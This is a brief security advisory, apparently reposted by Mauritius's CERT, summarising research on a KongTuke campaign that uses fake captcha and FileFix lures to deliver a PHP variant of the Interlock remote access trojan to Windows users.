KongTuke Campaign Deploys Modified Interlock RAT Using FileFix Method Against Windows Environments – Computer Emergency Response Team (Mauritius)

Researchers from The DFIR Report, collaborating with Proofpoint, have uncovered a resilient PHP-based variant of the Interlock ransomware group’s remote access trojan (RAT), marking a significant evolution from the previously documented JavaScript-driven NodeSnake. This adaptation, observed in campaigns linked to the LandUpdate808 threat cluster also known as KongTuke has been active since May 2025, exploiting compromised websites to deliver malicious payloads.

The infection chain initiates with a single-line script injected into website HTML, often undetected by site owners or visitors, which employs stringent IP filtering to selectively serve a JavaScript payload. This script deceives users into verifying their humanity via a captcha prompt, followed by instructions to paste clipboard content into the Windows Run dialog, ultimately executing a PowerShell script that deploys the Interlock RAT.

Proofpoint has tracked both Node.js and PHP variants, with the latter first appearing in June 2025, and recent observations indicate a shift to a FileFix delivery mechanism that deploys the PHP RAT, sometimes escalating to the Node.js version for deeper network persistence.